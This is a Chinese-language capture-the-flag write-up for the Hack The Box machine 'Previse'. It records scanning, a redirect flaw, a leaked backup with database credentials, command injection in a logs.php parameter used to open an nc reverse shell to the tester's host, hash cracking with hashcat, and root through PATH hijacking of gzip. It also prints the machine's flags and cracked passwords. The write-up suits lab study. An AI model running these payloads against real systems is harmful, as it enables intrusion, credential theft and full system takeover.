Previse-htb-writeup

0x00 靶场技能介绍

章节技能：302重定向（暂时性转移）、备份文件信息泄露、代码审计、命令执行、加盐md5密码破解、环境变量修改

参考链接：https://theredbay.net/infosec/htb/htb-previse/

0x01 用户权限获取

1、首先获取下靶机的IP地址：10.10.11.104

2、尝试下连通率，防止做无用的端口扫描

┌──(kali㉿kali)-[~/桌面]
└─$ ping 10.10.11.104 -c 4
PING 10.10.11.104 (10.10.11.104) 56(84) bytes of data.
64 bytes from 10.10.11.104: icmp_seq=1 ttl=63 time=359 ms
64 bytes from 10.10.11.104: icmp_seq=2 ttl=63 time=283 ms
64 bytes from 10.10.11.104: icmp_seq=3 ttl=63 time=307 ms
64 bytes from 10.10.11.104: icmp_seq=4 ttl=63 time=319 ms

--- 10.10.11.104 ping statistics ---
4 packets transmitted, 4 received, 0% packet loss, time 3008ms
rtt min/avg/max/mdev = 283.261/317.115/358.861/27.377 ms

3、开始尝试端口扫描，获取开放的端口情况

┌──(kali㉿kali)-[~/桌面]
└─$ sudo nmap -p- --min-rate=10000 -oG allports 10.10.11.104
[sudo] kali 的密码：
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-26 11:23 CST
Nmap scan report for 10.10.11.104
Host is up (0.30s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 9.39 seconds

┌──(kali㉿kali)-[~/桌面]
└─$ grep -oP '([0-9]+)/open' allports | awk -F/ '{print $1}' | tr '\n' ','
22,80, 

┌──(kali㉿kali)-[~/桌面]
└─$ sudo nmap -sV -sC -p22,80 -Pn --min-rate=10000 10.10.11.104
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-26 11:26 CST
Nmap scan report for 10.10.11.104
Host is up (0.36s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 53:ed:44:40:11:6e:8b:da:69:85:79:c0:81:f2:3a:12 (RSA)
|   256 bc:54:20:ac:17:23:bb:50:20:f4:e1:6e:62:0f:01:b5 (ECDSA)
|_  256 33:c1:89:ea:59:73:b1:78:84:38:a4:21:10:0c:91:d8 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
| http-title: Previse Login
|_Requested resource was login.php
|_http-server-header: Apache/2.4.29 (Ubuntu)
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.01 seconds

4、这里发现只开放2个开放端口信息，22和80端口

5、这里我分别使用 dirsearch 和 gobuster 进行了目录扫描，但是从结果上来看，并没有什么特殊的收获

┌──(kali㉿kali)-[~/桌面]
└─$ dirsearch -u http://10.10.11.104                                                 
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25
Wordlist size: 11460

Output File: /home/kali/桌面/reports/http_10.10.11.104/_23-12-26_11-31-58.txt

Target: http://10.10.11.104/

[11:31:58] Starting: 
[11:32:03] 301 -  309B  - /js  ->  http://10.10.11.104/js/                  
[11:32:12] 403 -  277B  - /.ht_wsr.txt                                      
[11:32:12] 403 -  277B  - /.htaccess.bak1                                   
[11:32:12] 403 -  277B  - /.htaccess.sample                                 
[11:32:12] 403 -  277B  - /.htaccess.orig
[11:32:12] 403 -  277B  - /.htaccess_sc
[11:32:12] 403 -  277B  - /.htaccess_extra                                  
[11:32:12] 403 -  277B  - /.htaccess.save
[11:32:12] 403 -  277B  - /.htaccess_orig
[11:32:12] 403 -  277B  - /.htaccessBAK                                     
[11:32:12] 403 -  277B  - /.htaccessOLD
[11:32:12] 403 -  277B  - /.htaccessOLD2                                    
[11:32:12] 403 -  277B  - /.htm                                             
[11:32:12] 403 -  277B  - /.html                                            
[11:32:12] 403 -  277B  - /.htpasswd_test                                   
[11:32:12] 403 -  277B  - /.htpasswds
[11:32:12] 403 -  277B  - /.httr-oauth
[11:32:15] 403 -  277B  - /.php                                             
[11:32:28] 302 -    4KB - /accounts.php  ->  login.php                      
[11:33:05] 200 -    0B  - /config.php                                       
[11:33:09] 301 -  310B  - /css  ->  http://10.10.11.104/css/                
[11:33:14] 302 -    0B  - /download.php  ->  login.php                      
[11:33:19] 200 -   15KB - /favicon.ico                                      
[11:33:20] 302 -    5KB - /files.php  ->  login.php                         
[11:33:20] 200 -  168B  - /footer.php                                       
[11:33:24] 200 -  381B  - /header.php                                       
[11:33:30] 200 -  475B  - /js/                                              
[11:33:34] 200 -  768B  - /login.php                                        
[11:33:35] 302 -    0B  - /logout.php  ->  login.php                        
[11:34:01] 403 -  277B  - /server-status                                    
[11:34:01] 403 -  277B  - /server-status/
[11:34:09] 302 -    3KB - /status.php  ->  login.php  
Task Completed 

┌──(kali㉿kali)-[~/桌面]
└─$ gobuster dir -u http://10.10.11.104 --wordlist=/usr/share/dirb/wordlists/common.txt 
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.11.104
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/dirb/wordlists/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.htaccess            (Status: 403) [Size: 277]
/.hta                 (Status: 403) [Size: 277]
/.htpasswd            (Status: 403) [Size: 277]
/css                  (Status: 301) [Size: 310] [--> http://10.10.11.104/css/]
/favicon.ico          (Status: 200) [Size: 15406]
/index.php            (Status: 302) [Size: 2801] [--> login.php]
/js                   (Status: 301) [Size: 309] [--> http://10.10.11.104/js/]
/server-status        (Status: 403) [Size: 277]
Progress: 4614 / 4615 (99.98%)
===============================================================
Finished
===============================================================

6、也就是从这里开始，我只是知道了首页的路径，还是默认的，但是有一点是可以注意到的，这里是302跳转，而不是301重定向，所以存在一些敏感信息的

/index.php            (Status: 302) [Size: 2801] [--> login.php]

7、使用curl来尝试获取下 index.php 页面的信息

┌──(kali㉿kali)-[~/桌面]
└─$ curl http://10.10.11.104/index.php 

<!DOCTYPE html>
<html>
    <head>
        <meta http-equiv="content-type" content="text/html; charset=UTF-8" />
        <meta charset="utf-8" />
    
            
        <meta name="viewport" content="width=device-width, initial-scale=1.0" />
        <meta name="description" content="Previse rocks your socks." />
        <meta name="author" content="m4lwhere" />
        <link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
        <link rel="icon" href="/favicon.ico" type="image/x-icon" />
        <link rel="apple-touch-icon" sizes="180x180" href="/apple-touch-icon.png">
        <link rel="icon" type="image/png" sizes="32x32" href="/favicon-32x32.png">
        <link rel="icon" type="image/png" sizes="16x16" href="/favicon-16x16.png">
        <link rel="manifest" href="/site.webmanifest">
        <link rel="stylesheet" href="css/uikit.min.css" />
        <script src="js/uikit.min.js"></script>
        <script src="js/uikit-icons.min.js"></script>
   

<title>Previse Home</title>
</head>
<body>
    
<nav class="uk-navbar-container" uk-navbar>
    <div class="uk-navbar-center">
        <ul class="uk-navbar-nav">
            <li class="uk-active"><a href="/index.php">Home</a></li>
            <li>
                <a href="accounts.php">ACCOUNTS</a>
                <div class="uk-navbar-dropdown">
                    <ul class="uk-nav uk-navbar-dropdown-nav">
                        <li><a href="accounts.php">CREATE ACCOUNT</a></li>
                    </ul>
                </div>
            </li>
            <li><a href="files.php">FILES</a></li>
            <li>
                <a href="status.php">MANAGEMENT MENU</a>
                <div class="uk-navbar-dropdown">
                    <ul class="uk-nav uk-navbar-dropdown-nav">
                        <li><a href="status.php">WEBSITE STATUS</a></li>
                        <li><a href="file_logs.php">LOG DATA</a></li>
                    </ul>
                </div>
            </li>
            <li><a href="#" class=".uk-text-uppercase"></span></a></li>
            <li>
                <a href="logout.php">
                    <button class="uk-button uk-button-default uk-button-small">LOG OUT</button>
                </a>
            </li>
        </ul>
    </div>
</nav>

    <section class="uk-section uk-section-default">
        <div class="uk-container">
            <h2 class="uk-heading-divider">Previse File Hosting</h2>
            <p>Previse File Hosting Service Management.</p>
            <p>Don't have an account? Create one!</p>
        </div>
    </section>
    
<div class="uk-position-bottom-center uk-padding-small">
        <a href="https://m4lwhere.org/" target="_blank"><button class="uk-button uk-button-text uk-text-small">Created by m4lwhere</button></a>
</div>
</body>
</html>

8、可以看出来，确实和默认看到的首页的内容是不一样的，我们使用burp进行抓包，防止进行重定向，查看下网站页面信息

9、这里我们重点关注到了 accounts.php 这个页面了

┌──(kali㉿kali)-[~/桌面]
└─$ curl http://10.10.11.104/accounts.php 

<!DOCTYPE html>
<html>
    <head>
        <meta http-equiv="content-type" content="text/html; charset=UTF-8" />
        <meta charset="utf-8" />
    
            
        <meta name="viewport" content="width=device-width, initial-scale=1.0" />
        <meta name="description" content="Previse rocks your socks." />
        <meta name="author" content="m4lwhere" />
        <link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
        <link rel="icon" href="/favicon.ico" type="image/x-icon" />
        <link rel="apple-touch-icon" sizes="180x180" href="/apple-touch-icon.png">
        <link rel="icon" type="image/png" sizes="32x32" href="/favicon-32x32.png">
        <link rel="icon" type="image/png" sizes="16x16" href="/favicon-16x16.png">
        <link rel="manifest" href="/site.webmanifest">
        <link rel="stylesheet" href="css/uikit.min.css" />
        <script src="js/uikit.min.js"></script>
        <script src="js/uikit-icons.min.js"></script>
   
<title>Previse Create Account</title>
</head>
<body>
    
<nav class="uk-navbar-container" uk-navbar>
    <div class="uk-navbar-center">
        <ul class="uk-navbar-nav">
            <li class="uk-active"><a href="/index.php">Home</a></li>
            <li>
                <a href="accounts.php">ACCOUNTS</a>
                <div class="uk-navbar-dropdown">
                    <ul class="uk-nav uk-navbar-dropdown-nav">
                        <li><a href="accounts.php">CREATE ACCOUNT</a></li>
                    </ul>
                </div>
            </li>
            <li><a href="files.php">FILES</a></li>
            <li>
                <a href="status.php">MANAGEMENT MENU</a>
                <div class="uk-navbar-dropdown">
                    <ul class="uk-nav uk-navbar-dropdown-nav">
                        <li><a href="status.php">WEBSITE STATUS</a></li>
                        <li><a href="file_logs.php">LOG DATA</a></li>
                    </ul>
                </div>
            </li>
            <li><a href="#" class=".uk-text-uppercase"></span></a></li>
            <li>
                <a href="logout.php">
                    <button class="uk-button uk-button-default uk-button-small">LOG OUT</button>
                </a>
            </li>
        </ul>
    </div>
</nav>

<section class="uk-section uk-section-default">
    <div class="uk-container">
        <h2 class="uk-heading-divider">Add New Account</h2>
        <p>Create new user.</p>
        <p class="uk-alert-danger">ONLY ADMINS SHOULD BE ABLE TO ACCESS THIS PAGE!!</p>
        <p>Usernames and passwords must be between 5 and 32 characters!</p>
    </p>
        <form role="form" method="post" action="accounts.php">
            <div class="uk-margin">
                <div class="uk-inline">
                    <span class="uk-form-icon" uk-icon="icon: user"></span>
                    <input type="text" name="username" class="uk-input" id="username" placeholder="Username">
                </div>
            </div>
            <div class="uk-margin">
                <div class="uk-inline">
                    <span class="uk-form-icon" uk-icon="icon: lock"></span>
                    <input type="password" name="password" class="uk-input" id="password" placeholder="Password">
                </div>
            </div>
            <div class="uk-margin">
                <div class="uk-inline">
                    <span class="uk-form-icon" uk-icon="icon: lock"></span>
                    <input type="password" name="confirm" class="uk-input" id="confirm" placeholder="Confirm Password">
                </div>
            </div>
            <button type="submit" name="submit" class="uk-button uk-button-default">CREATE USER</button>
        </form>
    </div>
</section>
            
<div class="uk-position-bottom-center uk-padding-small">
        <a href="https://m4lwhere.org/" target="_blank"><button class="uk-button uk-button-text uk-text-small">Created by m4lwhere</button></a>
</div>
</body>
</html>

10、在这个页面上，可以注册账号的，我们这里注册了个 test123:test123 的账号

11、通过使用我们注册的账号登录这个平台，发现 files.php 页面上，有一个备份压缩包文件，我们尝试下载查看

http://10.10.11.104/files.php

12、我们通过查看 config.php 文件，发现了涉及数据库的账号密码

cat config.php

<?php
function connectDB(){
    $host = 'localhost';
    $user = 'root';
    $passwd = 'mySQL_p@ssw0rd!:)';
    $db = 'previse';
    $mycon = new mysqli($host, $user, $passwd, $db);
    return $mycon;
}
?>

13、同时通过 file_logs.php 页面，下载了log日志信息，里面包含了另一个账号的登录信息

http://10.10.11.104/file_logs.php

14、同时也在下载的压缩包中的 logs.php 文件中发现了存在命令执行的关键代码

http://10.10.11.104/login.php

$output = exec("/usr/bin/python /opt/scripts/log_process.py {$_POST['delim']}");
echo $output;

15、这里的 delim 参数是我们可以进行控制的，然后这里是调用了 exec 函数进行命令执行的

16、我们这里全程采用 curl 进行漏洞利用，首先获取下当前登录账号的 cookie 信息

┌──(kali㉿kali)-[~/桌面]
└─$ curl -XPOST -c - 'http://10.10.11.104/login.php' --data-raw 'username=test123&password=test123'

10.10.11.104    FALSE   /       FALSE   0       PHPSESSID       9hqk10ige43tpd8cgub3hk4mia

17、然后构造下反弹shell的命令，进行初始shell的获取

┌──(kali㉿kali)-[~/桌面]
└─$ curl -XPOST 'http://10.10.11.104/logs.php' -H 'Cookie: PHPSESSID=9hqk10ige43tpd8cgub3hk4mia' --data-raw 'delim=space; nc 10.10.14.2 443 -e /bin/bash'

18、这里可以看到，我们成功的获取到初始的shell环境，虽说是 www-data 权限吧

┌──(kali㉿kali)-[~/桌面]
└─$ nc -lvnp 443                   
listening on [any] 443 ...
connect to [10.10.14.2] from (UNKNOWN) [10.10.11.104] 54358
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@previse:/var/www/html$ 

www-data@previse:/var/www/html$ ls -la
ls -la
total 188
drwxr-xr-x 4 www-data www-data  4096 Jul 26  2021 .
drwxr-xr-x 3 root     root      4096 Jul 26  2021 ..
-rw-r--r-- 1 www-data www-data  5689 Jun 12  2021 accounts.php
-rwxrwxr-x 1 www-data www-data 16042 Jun  3  2021 android-chrome-192x192.png
-rwxrwxr-x 1 www-data www-data 50545 Jun  3  2021 android-chrome-512x512.png
-rwxrwxr-x 1 www-data www-data 14096 Jun  3  2021 apple-touch-icon.png
-rw-r--r-- 1 www-data www-data   208 Jun 12  2021 config.php
drwxr-xr-x 2 www-data www-data  4096 Jul 26  2021 css
-rw-r--r-- 1 www-data www-data  1562 Jun  9  2021 download.php
-rwxrwxr-x 1 www-data www-data   724 Jun  3  2021 favicon-16x16.png
-rwxrwxr-x 1 www-data www-data  1708 Jun  3  2021 favicon-32x32.png
-rwxrwxr-x 1 www-data www-data 15406 Jun  3  2021 favicon.ico
-rw-r--r-- 1 www-data www-data  1191 Jun 12  2021 file_logs.php
-rw-r--r-- 1 www-data www-data  6107 Jun  9  2021 files.php
-rw-r--r-- 1 www-data www-data   217 Jun  3  2021 footer.php
-rw-r--r-- 1 www-data www-data  1012 Jun  6  2021 header.php
-rw-r--r-- 1 www-data www-data   551 Jun  6  2021 index.php
drwxr-xr-x 2 www-data www-data  4096 Jul 26  2021 js
-rw-r--r-- 1 www-data www-data  2967 Jun 12  2021 login.php
-rw-r--r-- 1 www-data www-data   190 Jun  8  2021 logout.php
-rw-r--r-- 1 www-data www-data  1174 Jun  9  2021 logs.php
-rw-r--r-- 1 www-data www-data  1279 Jun  5  2021 nav.php
-rwxrwxr-x 1 www-data www-data   263 Jun  3  2021 site.webmanifest
-rw-r--r-- 1 www-data www-data  1900 Jun  9  2021 status.php
www-data@previse:/var/www/html$      

19、按照以往的经验来说，肯定是翻当前网站根目录进行配置信息获取，切换到用户权限下的，由于我们前期通过查看配置文件发现了数据库的连接方式，同时知道了有个 m4lwhere 用户的账号，这里就直接通过数据库查看下这个账号的密码信息

www-data@previse:/var/www/html$ mysql -u 'root' --password='mySQL_p@ssw0rd!:)' -e 'show databases'
< --password='mySQL_p@ssw0rd!:)' -e 'show databases'
mysql: [Warning] Using a password on the command line interface can be insecure.
+--------------------+
| Database           |
+--------------------+
| information_schema |
| mysql              |
| performance_schema |
| previse            |
| sys                |
+--------------------+
www-data@previse:/var/www/html$ mysql -u 'root' --password='mySQL_p@ssw0rd!:)' -D previse -e 'show tables'
<ord='mySQL_p@ssw0rd!:)' -D previse -e 'show tables'
mysql: [Warning] Using a password on the command line interface can be insecure.
+-------------------+
| Tables_in_previse |
+-------------------+
| accounts          |
| files             |
+-------------------+
www-data@previse:/var/www/html$ mysql -u 'root' --password='mySQL_p@ssw0rd!:)' -D previse -e 'describe accounts'
<ySQL_p@ssw0rd!:)' -D previse -e 'describe accounts'
mysql: [Warning] Using a password on the command line interface can be insecure.
+------------+--------------+------+-----+-------------------+----------------+
| Field      | Type         | Null | Key | Default           | Extra          |
+------------+--------------+------+-----+-------------------+----------------+
| id         | int(11)      | NO   | PRI | NULL              | auto_increment |
| username   | varchar(50)  | NO   | UNI | NULL              |                |
| password   | varchar(255) | NO   |     | NULL              |                |
| created_at | datetime     | YES  |     | CURRENT_TIMESTAMP |                |
+------------+--------------+------+-----+-------------------+----------------+
www-data@previse:/var/www/html$ mysql -u 'root' --password='mySQL_p@ssw0rd!:)' -D previse -e 'select username,password from accounts'
<previse -e 'select username,password from accounts'
mysql: [Warning] Using a password on the command line interface can be insecure.
+----------+------------------------------------+
| username | password                           |
+----------+------------------------------------+
| m4lwhere | $1$🧂llol$DQpmdvnb7EeuO6UaqRItf. |
| test123  | $1$🧂llol$sP8qi2I.K6urjPuzdGizl1 |
+----------+------------------------------------+
www-data@previse:/var/www/html$ 

20、可以发现了，存有我们自己的账号信息，和另一个 m4lwhere 的密码信息

m4lwhere
$1$🧂llol$DQpmdvnb7EeuO6UaqRItf.

21、从这里可以看出来，密码是加盐的 MD5 哈希值，将盐添加到散列函数中以增加随机性，这可以防止在尝试破解密码时使用彩虹表。

22、我们可以使用john进行尝试下看看

┌──(kali㉿kali)-[~/桌面]
└─$ cat hash
$1$🧂llol$DQpmdvnb7EeuO6UaqRItf.

┌──(kali㉿kali)-[~/桌面]
└─$ sudo john ./hash --wordlist=/usr/share/wordlists/rockyou.txt
[sudo] kali 的密码：
Warning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-long"
Use the "--format=md5crypt-long" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (md5crypt, crypt(3) $1$ (and variants) [MD5 128/128 ASIMD 4x2])
Will run 3 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:02:18 DONE (2023-12-26 15:28) 0g/s 101761p/s 101761c/s 101761C/s   c125263..*7¡Vamos!
Session completed.

23、看来john不适合破解带盐的密码啊，呢就hashcat尝试下吧

shiyan@InfoSec dict-list % sudo hashcat -a 0 -m 500 ./hash ./rockyou.txt
Password:
hashcat (v6.2.6) starting

* Device #2: Apple's OpenCL drivers (GPU) are known to be unreliable.
             You have been warned.

METAL API (Metal 341.29)
========================
* Device #1: Apple M2 Pro, 5408/10922 MB, 19MCU

OpenCL API (OpenCL 1.2 (Sep 30 2023 03:48:09)) - Platform #1 [Apple]
====================================================================
* Device #2: Apple M2 Pro, skipped

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Optimizers applied:
* Zero-Byte
* Single-Hash
* Single-Salt

ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.

Watchdog: Temperature abort trigger set to 100c

Host memory required for this attack: 667 MB

Dictionary cache built:
* Filename..: ./rockyou.txt
* Passwords.: 14344392
* Bytes.....: 139921507
* Keyspace..: 14344385
* Runtime...: 1 sec

Cracking performance lower than expected?                 

* Append -O to the commandline.
  This lowers the maximum supported password/salt length (usually down to 32).

* Append -w 3 to the commandline.
  This can cause your screen to lag.

* Append -S to the commandline.
  This has a drastic speed impact but can be better for specific attacks.
  Typical scenarios are a small wordlist but a large ruleset.

* Update your backend API runtime / driver the right way:
  https://hashcat.net/faq/wrongdriver

* Create more work items to make use of your parallelization power:
  https://hashcat.net/faq/morework

$1$🧂llol$DQpmdvnb7EeuO6UaqRItf.:ilovecody112235!         
                                                          
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 500 (md5crypt, MD5 (Unix), Cisco-IOS $1$ (MD5))
Hash.Target......: $1$🧂llol$DQpmdvnb7EeuO6UaqRItf.
Time.Started.....: Tue Dec 26 15:49:54 2023 (22 secs)
Time.Estimated...: Tue Dec 26 15:50:16 2023 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (./rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:   341.0 kH/s (29.57ms) @ Accel:32 Loops:125 Thr:128 Vec:1
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 7471104/14344385 (52.08%)
Rejected.........: 0/7471104 (0.00%)
Restore.Point....: 7393280/14344385 (51.54%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:875-1000
Candidate.Engine.: Device Generator
Candidates.#1....: iloverobert!!! -> iarn17
Hardware.Mon.SMC.: Fan0: 0%, Fan1: 0%
Hardware.Mon.#1..: Util: 99%

Started: Tue Dec 26 15:49:40 2023
Stopped: Tue Dec 26 15:50:17 2023
shiyan@InfoSec dict-list % 

24、这里可以看出来我们成功的破解出来了，密码是 ilovecody112235! ，那就开始ssh进行登录下看看吧

┌──(kali㉿kali)-[~/桌面]
└─$ ssh m4lwhere@10.10.11.104                                   
The authenticity of host '10.10.11.104 (10.10.11.104)' can't be established.
ED25519 key fingerprint is SHA256:BF5tg2bhcRrrCuaeVQXikjd8BCPxgLsnnwHlaBo3dPs.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.11.104' (ED25519) to the list of known hosts.
m4lwhere@10.10.11.104's password: 
Welcome to Ubuntu 18.04.5 LTS (GNU/Linux 4.15.0-151-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Tue Dec 26 07:52:02 UTC 2023

  System load:  0.01              Processes:           177
  Usage of /:   49.4% of 4.85GB   Users logged in:     0
  Memory usage: 22%               IP address for eth0: 10.10.11.104
  Swap usage:   0%

0 updates can be applied immediately.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

Last login: Fri Jun 18 01:09:10 2021 from 10.10.10.5
m4lwhere@previse:~$ id
uid=1000(m4lwhere) gid=1000(m4lwhere) groups=1000(m4lwhere)

25、获取下第一个flag信息，查看下

m4lwhere@previse:~$ pwd
/home/m4lwhere
m4lwhere@previse:~$ ls
user.txt
m4lwhere@previse:~$ cat user.txt
deb284bbe7ee6def4fda1b734c37a3a3
m4lwhere@previse:~$ 

0x02 系统权限获取

26、接下来就是获取系统权限了，查看下sudo的信息

m4lwhere@previse:~$ sudo -l
[sudo] password for m4lwhere: 
User m4lwhere may run the following commands on previse:
    (root) /opt/scripts/access_backup.sh
m4lwhere@previse:~$ 

27、继续查看这个可以root运行的 sh 脚本文件信息

m4lwhere@previse:~$ ls -la /opt/scripts/access_backup.sh
-rwxr-xr-x 1 root root 486 Jun  6  2021 /opt/scripts/access_backup.sh
m4lwhere@previse:~$ cat /opt/scripts/access_backup.sh
#!/bin/bash

# We always make sure to store logs, we take security SERIOUSLY here

# I know I shouldnt run this as root but I cant figure it out programmatically on my account
# This is configured to run with cron, added to sudo so I can run as needed - we'll fix it later when there's time

gzip -c /var/log/apache2/access.log > /var/backups/$(date --date="yesterday" +%Y%b%d)_access.gz
gzip -c /var/www/file_access.log > /var/backups/$(date --date="yesterday" +%Y%b%d)_file_access.gz
m4lwhere@previse:~$ ls -la /var/log/apache2/access.log
ls: cannot access '/var/log/apache2/access.log': Permission denied
m4lwhere@previse:~$ ls -la /var/www/file_access.log
-rw-r--r-- 1 www-data www-data 537 Dec 26 06:44 /var/www/file_access.log

28、这里可以看到使用 gzip进行打包文件，而gzip没有使用绝对路径的地址，那我们可以从这里进行利用。

嗯，这对我们来说是个好消息。这里的错误是开发人员没有使用绝对路径来引用可执行文件。shell 将遍历PATH 环境变量的每个条目，直到找到要执行的命令。这意味着，如果我们有一个名为gzipor的命令date，该命令位于由PATH变量在预期命令之前引用的目录中（/bin/gzip在/bin/date本例中），我们可以让它执行为root.

让我们利用这一点。我们需要在我们可以控制的目录中创建一个可执行文件，并让它运行一些自定义代码。我们实际上有两个选择：gzip和date。让我们一起去吧gzip。最后，我们试图获得一个 shell，因此显而易见的选择是简单地从我们的可执行文件中root调用。bash我们需要调整PATH环境变量，以确保脚本选择我们的版本gzip，而不是在 /bin/gzip.

echo "/bin/bash 1>&2" > ./gzip
chmod 755 ./gzip
export PATH=./:$PATH
sudo /opt/scripts/access_backup.sh

29、那我们就开始尝试下，并获取最终的root的flag信息

m4lwhere@previse:~$ 
m4lwhere@previse:~$ echo "/bin/bash 1>&2" > ./gzip
m4lwhere@previse:~$ chmod 755 ./gzip
m4lwhere@previse:~$ export PATH=./:$PATH
m4lwhere@previse:~$ sudo /opt/scripts/access_backup.sh
root@previse:~# pwd
/home/m4lwhere
root@previse:~# cat /root/root.txt
641c1e383ce8abf1e95f2f2a2f0591f0
root@previse:~# 

0x03 通关凭证展示

https://www.hackthebox.com/achievement/machine/1705469/373